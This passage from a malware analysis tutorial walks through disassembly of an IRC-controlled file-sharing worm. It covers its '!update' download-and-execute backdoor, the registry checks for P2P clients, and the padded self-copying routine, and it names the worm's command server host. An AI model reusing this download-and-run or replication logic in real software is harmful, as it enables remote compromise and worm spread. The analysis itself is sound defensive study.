Again the function to create a random name is called and the resulting string is then passed to wsprintfA which formats a string in the following format: "$system_directory\$random.exe". So the !update command somehow makes the malware create an executable, probably downloaded from the web. Subsequently a new thread is created, with the start address of another function(not a full listing):
.text:00401366 mov dword ptr [ebx+204h], 1 .text:00401370 push 0 .text:00401372 push 0 .text:00401374 push 0 .text:00401376 push 0 .text:00401378 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)" .text:0040137D call InternetOpenA .text:00401382 mov [ebp+var_418], eax .text:00401388 push 0 .text:0040138A push 0 .text:0040138C push 0 .text:0040138E push 0 .text:00401390 lea eax, [ebp+var_414] .text:00401396 push eax .text:00401397 push [ebp+var_418] .text:0040139D call InternetOpenUrlA .text:004013A2 mov ebx, eax .text:004013A4 or ebx, ebx .text:004013A6 jz loc_4014D0 .text:004013AC push 0 ; hTemplateFile .text:004013AE push 0 ; dwFlagsAndAttributes .text:004013B0 push 2 ; dwCreationDisposition .text:004013B2 push 0 ; lpSecurityAttributes .text:004013B4 push 0 ; dwShareMode .text:004013B6 push 40000000h ; dwDesiredAccess .text:004013BB lea eax, [ebp+File] .text:004013C1 push eax ; lpFileName .text:004013C2 call CreateFileA .text:004013C7 mov [ebp+hObject], eax .text:004013CD cmp eax, 1 .text:004013D0 jnb short loc_401414 .text:004013D2 push offset aTibicP2p3 ; "##TIBiC-P2P3##" .text:004013D7 push offset aPrivmsgSUpdate ; "PRIVMSG %s :Update error: File write er"... .text:004013DC lea eax, [ebp+buf] .text:004013E2 push eax .text:004013E3 call wsprintfA .text:004013E8 add esp, 0Ch .text:004013EB lea eax, [ebp+buf] .text:004013F1 push eax ; lpString .text:004013F2 call lstrlenA .text:004013F7 push 0 ; flags .text:004013F9 push eax ; len .text:004013FA lea edi, [ebp+buf] .text:00401400 push edi ; buf .text:00401401 push [ebp+s] ; s .text:00401407 call send .text:0040140C xor eax, eax .text:0040140E inc eax .text:0040140F jmp loc_4014D8 .text:00401414 ; --------------------------------------------------------------------------- .text:00401414 .text:00401414 loc_401414: ; CODE XREF: sub_401347+89 .text:00401414 ; sub_401347+124 .text:00401414 push 200h .text:00401419 push 0 .text:0040141B lea eax, [ebp+Buffer] .text:00401421 push eax .text:00401422 call memset .text:00401427 add esp, 0Ch .text:0040142A lea eax, [ebp+nNumberOfBytesToWrite] .text:00401430 push eax .text:00401431 push 200h .text:00401436 lea eax, [ebp+Buffer] .text:0040143C push eax .text:0040143D push ebx .text:0040143E call InternetReadFile .text:00401443 push 0 ; lpOverlapped .text:00401445 lea eax, [ebp+NumberOfBytesWritten] .text:0040144B push eax ; lpNumberOfBytesWritten .text:0040144C push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite .text:00401452 lea eax, [ebp+Buffer] .text:00401458 push eax ; lpBuffer .text:00401459 push [ebp+hObject] ; hFile .text:0040145F call WriteFile .text:00401464 cmp [ebp+nNumberOfBytesToWrite], 0 .text:0040146B jnz short loc_401414 .text:0040146D push [ebp+hObject] ; hObject .text:00401473 call CloseHandle .text:00401478 push 5 ; nShowCmd .text:0040147A push 0 ; lpDirectory .text:0040147C push 0 ; lpParameters .text:0040147E lea eax, [ebp+File] .text:00401484 push eax ; lpFile .text:00401485 push offset aOpen ; lpOperation .text:0040148A push 0 ; hwnd text:0040148C call ShellExecuteA
The code of this function is quite clear. The thread downloads the file from the address passed as a parameter(the text that follows "!update ") using the "WinInet"-API, writes it to the disk and executes it. On error, an error message is sent to the irc-user that issued the "!update" command.
The backdoor offers the attacker the possibility to run arbitrary code on the infected system with the rights of the logged in user. This gives him almost full control over the system since too many Windows users work under an account with administrative rights.
If you want to check this malware-behaviour yourself on your virtual machine, set up an irc-daemon, infect the virtual environment and edit the system32\drivers\etc\hosts in the way, that "tbc3.hanged.tk" is resolved as the address of the machine running the irc-daemon. Now enter the channel with another irc-client and try sending "!exit" or "!update" to the malware(if you want to test the "!update" command without connecting the infected system to the internet you should set up a http-daemon too).
We have now dissected and analyzed almost the complete executable, only one part is left: The thread that was created before the malware connected to the irc-server. This is the thread's code:
.text:0040299B loc_40299B: ; CODE XREF: StartAddress+12 .text:0040299B call sub_4027F2 .text:004029A0 push 0EA60h ; dwMilliseconds .text:004029A5 call Sleep .text:004029AA jmp short loc_40299B .text:004029AA StartAddress endp
So this thread continuously calls a function and waits 1 minute. Let's analyze the function which is repeatedly called:
.text:0040283B push eax ; lpSubKey .text:0040283C push 80000001h ; hKey .text:00402841 call RegOpenKeyExA .text:00402846 or eax, eax .text:00402848 jnz short loc_402851 .text:0040284A mov [ebp+var_8], 1 ... .text:00402864 push offset aSoftwareImeshC ; lpSubKey .text:00402869 push 80000001h ; hKey .text:0040286E call RegOpenKeyExA .text:00402873 or eax, eax .text:00402875 jnz short loc_40287A .text:00402877 xor edi, edi .text:00402879 inc edi ... .text:0040288D push offset aSoftwareMorphe ; lpSubKey .text:00402892 push 80000002h ; hKey .text:00402897 call RegOpenKeyExA .text:0040289C or eax, eax .text:0040289E jnz short loc_4028A3 .text:004028A0 xor esi, esi .text:004028A2 inc esi ...
Some other calls to RegOpenKeyExA follow, but I think it's not necessary to list them here. This code excerpt checks for the existence of registry keys belonging to various file sharing software. If they exist, a specific variable or register is set to one. Some code later, these register/variables are checked:
.text:0040292E cmp [ebp+var_8], 1 .text:00402932 jz short loc_40294F .text:00402934 cmp edi, 1 .text:00402937 jz short loc_40294F .text:00402939 cmp esi, 1 .text:0040293C jz short loc_40294F .text:0040293E cmp ebx, 1 .text:00402941 jz short loc_40294F .text:00402943 cmp [ebp+var_C], 1 .text:00402947 jz short loc_40294F .text:00402949 cmp [ebp+var_10], 1 .text:0040294D jnz short loc_402954 .text:0040294F .text:0040294F loc_40294F: ; CODE XREF: sub_4027F2+140 .text:0040294F ; sub_4027F2+145 ... .text:0040294F call sub_4026BA .text:00402954 .text:00402954 loc_402954: ; CODE XREF: sub_4027F2+15B
So if one of the file sharing programs is installed, the program calls the function located at 0x4026BA:
.text:004026BA push ebp
.text:004026BB mov ebp, esp
.text:004026BD sub esp, 400h
.text:004026C3 push ebx
.text:004026C4 push esi
.text:004026C5 push edi
.text:004026C6 push 0 ; lpModuleName
.text:004026C8 call GetModuleHandleA
.text:004026CD push 100h ; nSize
.text:004026D2 lea ebx, [ebp+Filename]
.text:004026D8 push ebx ; lpFilename
.text:004026D9 push eax ; hModule
.text:004026DA call GetModuleFileNameA
.text:004026DF push 100h ; uSize
.text:004026E4 lea eax, [ebp+Buffer]
.text:004026EA push eax ; lpBuffer
.text:004026EB call GetSystemDirectoryA
.text:004026F0 push dword_4040A4
.text:004026F6 lea eax, [ebp+Buffer]
.text:004026FC push eax
.text:004026FD push offset aSS ; "%s\\%s"
.text:00402702 lea eax, [ebp+PathName]
.text:00402708 push eax
.text:00402709 call wsprintfA
.text:0040270E add esp, 10h
.text:00402711 push 0 ; lpSecurityAttributes
.text:00402713 lea eax, [ebp+PathName]
.text:00402719 push eax ; lpPathName
.text:0040271A call CreateDirectoryA
This code again determines the system directory and the module file. The system directory is then combined with the hard coded string "msview" and passed to CreateDirectoryA which creates a subfolder of the system directory named "msview". This code is followed by two similar loops, here is the first one:
.text:0040271F xor edi, edi
.text:00402721 jmp short loc_40277B
.text:00402723 ; ---------------------------------------------------------------------------
.text:00402723
.text:00402723 loc_402723: ; CODE XREF: sub_4026BA+C9
.text:00402723 push dword_4041C8[edi*4]
.text:0040272A lea ebx, [ebp+PathName]
.text:00402730 push ebx
.text:00402731 push offset aSS ; "%s\\%s"
.text:00402736 lea ebx, [ebp+var_100]
.text:0040273C push ebx
.text:0040273D call wsprintfA
.text:00402742 mov ebx, dword_4040A8[edi*4]
.text:00402749 shl ebx, 0Ah
.text:0040274C push ebx
.text:0040274D lea ebx, [ebp+var_100]
.text:00402753 push ebx
.text:00402754 lea ebx, [ebp+Filename]
.text:0040275A push ebx
.text:0040275B call sub_4014DF
.text:00402760 add esp, 1Ch
.text:00402763 or eax, eax
.text:00402765 jnz short loc_402773
.text:00402767 push 3E8h ; dwMilliseconds
.text:0040276C call Sleep
.text:00402771 jmp short loc_40277A
.text:00402773 ; ---------------------------------------------------------------------------
.text:00402773
.text:00402773 loc_402773: ; CODE XREF: sub_4026BA+AB
.text:00402773 push 1 ; dwMilliseconds
.text:00402775 call Sleep
.text:0040277A
.text:0040277A loc_40277A: ; CODE XREF: sub_4026BA+B7
.text:0040277A inc edi
.text:0040277B
.text:0040277B loc_40277B: ; CODE XREF: sub_4026BA+67
.text:0040277B cmp dword_4041C8[edi*4], 0
.text:00402783 jnz short loc_402723
This loop traverses an array of DWORDs terminated by 0. Every element of the array is a pointer to string since it's used in combination with wsprintfA to format a path name at the beginning of the loop. There is a second array of DWORDs located at 4040A8 which seems to contain numbers which are shifted by 10 bits to the left in the loop, which is equal to a multiplication by 2^10=1024. The path with string in the first array, the multiplied value from the second array and the module file name are then passed to sub_4014DF(only a small part of the function):
.text:0040156A push 0 ; lpFileSizeHigh .text:0040156C push [ebp+hObject] ; hFile .text:0040156F call GetFileSize .text:00401574 mov [ebp+nNumberOfBytesToRead], eax .text:00401577 call GetProcessHeap .text:0040157C push [ebp+nNumberOfBytesToRead] ; dwBytes .text:0040157F push 0 ; dwFlags .text:00401581 push eax ; hHeap .text:00401582 call HeapAlloc .text:00401587 mov [ebp+lpMem], eax .text:0040158A push 0 ; lpOverlapped .text:0040158C lea eax, [ebp+NumberOfBytesRead] .text:0040158F push eax ; lpNumberOfBytesRead .text:00401590 push [ebp+nNumberOfBytesToRead] ; nNumberOfBytesToRead .text:00401593 push [ebp+lpMem] ; lpBuffer .text:00401596 push [ebp+hObject] ; hFile .text:00401599 call ReadFile .text:0040159E or eax, eax .text:004015A0 jnz short loc_4015CA .text:004015A2 call GetProcessHeap .text:004015A7 push [ebp+lpMem] ; lpMem .text:004015AA push 0 ; dwFlags .text:004015AC push eax ; hHeap .text:004015AD call HeapFree .text:004015B2 push [ebp+hObject] ; hObject .text:004015B5 call CloseHandle .text:004015BA push [ebp+hFile] ; hObject .text:004015BD call CloseHandle .text:004015C2 xor eax, eax .text:004015C4 inc eax .text:004015C5 jmp loc_4016E1 .text:004015CA ; --------------------------------------------------------------------------- .text:004015CA .text:004015CA loc_4015CA: ; CODE XREF: sub_4014DF+C1 .text:004015CA xor ebx, ebx .text:004015CC jmp short loc_40161E .text:004015CE ; --------------------------------------------------------------------------- .text:004015CE .text:004015CE loc_4015CE: ; CODE XREF: sub_4014DF+147 .text:004015CE mov eax, [ebp+lpMem] .text:004015D1 cmp byte ptr [eax+ebx], '-' .text:004015D5 jnz short loc_40161D .text:004015D7 cmp byte ptr [ebx+eax+1], '=' .text:004015DC jnz short loc_40161D .text:004015DE cmp byte ptr [ebx+eax+2], '@' .text:004015E3 jnz short loc_40161D .text:004015E5 cmp byte ptr [ebx+eax+3], '#' .text:004015EA jnz short loc_40161D .text:004015EC cmp byte ptr [ebx+eax+4], 'E' .text:004015F1 jnz short loc_40161D .text:004015F3 cmp byte ptr [ebx+eax+5], 'O' .text:004015F8 jnz short loc_40161D .text:004015FA cmp byte ptr [ebx+eax+6], 'F' .text:004015FF jnz short loc_40161D .text:00401601 cmp byte ptr [ebx+eax+7], '#' .text:00401606 jnz short loc_40161D .text:00401608 cmp byte ptr [ebx+eax+8], '@' .text:0040160D jnz short loc_40161D .text:0040160F cmp byte ptr [ebx+eax+9], '=' .text:00401614 jnz short loc_40161D .text:00401616 cmp byte ptr [ebx+eax+0Ah], '-' .text:0040161B jz short loc_401628 .text:0040161D .text:0040161D loc_40161D: ; CODE XREF: sub_4014DF+F6 .text:0040161D ; sub_4014DF+FD ... .text:0040161D inc ebx .text:0040161E .text:0040161E loc_40161E: ; CODE XREF: sub_4014DF+ED .text:0040161E mov eax, ebx .text:00401620 add eax, 0Bh .text:00401623 cmp eax, [ebp+nNumberOfBytesToRead] .text:00401626 jb short loc_4015CE .text:00401628 .text:00401628 loc_401628: ; CODE XREF: sub_4014DF+13C .text:00401628 push 0 ; lpOverlapped .text:0040162A lea eax, [ebp+NumberOfBytesWritten] .text:0040162D push eax ; lpNumberOfBytesWritten .text:0040162E push ebx ; nNumberOfBytesToWrite .text:0040162F push [ebp+lpMem] ; lpBuffer .text:00401632 push [ebp+hFile] ; hFile .text:00401635 call WriteFile
This code completely reads a opened file, which is the image of the process on disk. After that a loop follows, which searches the file contents which were just read for the pattern "-=@#EOF#@=-" and writes the contents of the file until this signature is found to a second, newly created, file. This mechanism is used for the worm to produce replicas with different file sizes. The "-=@#EOF#@=-" signature is used as a pattern to indicate the end of the "real" executable. After that an additional amount of zeros is written to make the filesize of the new copy differ:
.text:00401678 push [ebp+nNumberOfBytesToWrite] ; dwBytes
.text:0040167B push 0 ; dwFlags
.text:0040167D push eax ; hHeap
.text:0040167E call HeapAlloc
.text:00401683 mov [ebp+lpMem], eax
.text:00401686 push [ebp+nNumberOfBytesToWrite]
.text:00401689 push eax
.text:0040168A call RtlZeroMemory
.text:0040168F lea eax, [ebp+Buffer]
.text:00401692 push eax ; lpString
.text:00401693 call lstrlenA
.text:00401698 push 0 ; lpOverlapped
.text:0040169A lea edi, [ebp+NumberOfBytesWritten]
.text:0040169D push edi ; lpNumberOfBytesWritten
.text:0040169E push eax ; nNumberOfBytesToWrite
.text:0040169F lea edi, [ebp+Buffer]
.text:004016A2 push edi ; lpBuffer
.text:004016A3 push [ebp+hFile] ; hFile
.text:004016A6 call WriteFile
.text:004016AB push 0 ; lpOverlapped
.text:004016AD lea eax, [ebp+NumberOfBytesWritten]
.text:004016B0 push eax ; lpNumberOfBytesWritten
.text:004016B1 push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
.text:004016B4 push [ebp+lpMem] ; lpBuffer
.text:004016B7 push [ebp+hFile] ; hFile
.text:004016BA call WriteFile
The amount of zeros to be written was given as an argument. So the two tables used in the replication loop denote the filenames and the sizes to add to the file in kilobytes(the second loop in the replication-procedure is similar). After replicating itself when a file sharing application is found, some other actions are done by the worm:
.text:00402954 loc_402954: ; CODE XREF: sub_4027F2+15B .text:00402954 cmp [ebp+var_8], 1 .text:00402958 jnz short loc_40295F .text:0040295A call sub_4016E6 .text:0040295F .text:0040295F loc_40295F: ; CODE XREF: sub_4027F2+166 .text:0040295F cmp edi, 1 .text:00402962 jnz short loc_402969 .text:00402964 call sub_401D2F .text:00402969 .text:00402969 loc_402969: ; CODE XREF: sub_4027F2+170 .text:00402969 cmp esi, 1 .text:0040296C jnz short loc_402973 .text:0040296E call sub_401EB9 .text:00402973 .text:00402973 loc_402973: ; CODE XREF: sub_4027F2+17A .text:00402973 cmp ebx, 1 .text:00402976 jnz short loc_40297D .text:00402978 call sub_4020E7 .text:0040297D .text:0040297D loc_40297D: ; CODE XREF: sub_4027F2+184 .text:0040297D cmp [ebp+var_C], 1 .text:00402981 jnz short loc_402988 .text:00402983 call sub_4022FB .text:00402988 .text:00402988 loc_402988: ; CODE XREF: sub_4027F2+18F .text:00402988 cmp [ebp+var_10], 1 .text:0040298C jnz short loc_402993 .text:0040298E call sub_4024E2 .text:00402993
Now a different function is called for every different file sharing software. They are all not very interesting and just change some config files/registry settings, i.e. to add the system32\msview-directory, where the malware placed it's copies, to the list of shared folders or to speed up the spreading process by changing some upload settings.
So, after this analysis, we have a complete knowledge of what the malware does(without even running the binary). Here is a summary of what we found out:
It might seem, that you could disinfect a system compromised by this malware by deleting the autostart entries and removing the created files, but you don't know, which files have been executed by an attacker using the installed backdoor. For this reason, a system compromised worm is not to be trusted and the only clean solution is to completely rebuild the system. Any data that was accessible to this system is not to be trusted, for you can't know what other malicious code was run.
If you have feedback, suggestions and/or (constructive) criticism, send it to lesco[at]gmx[dot]de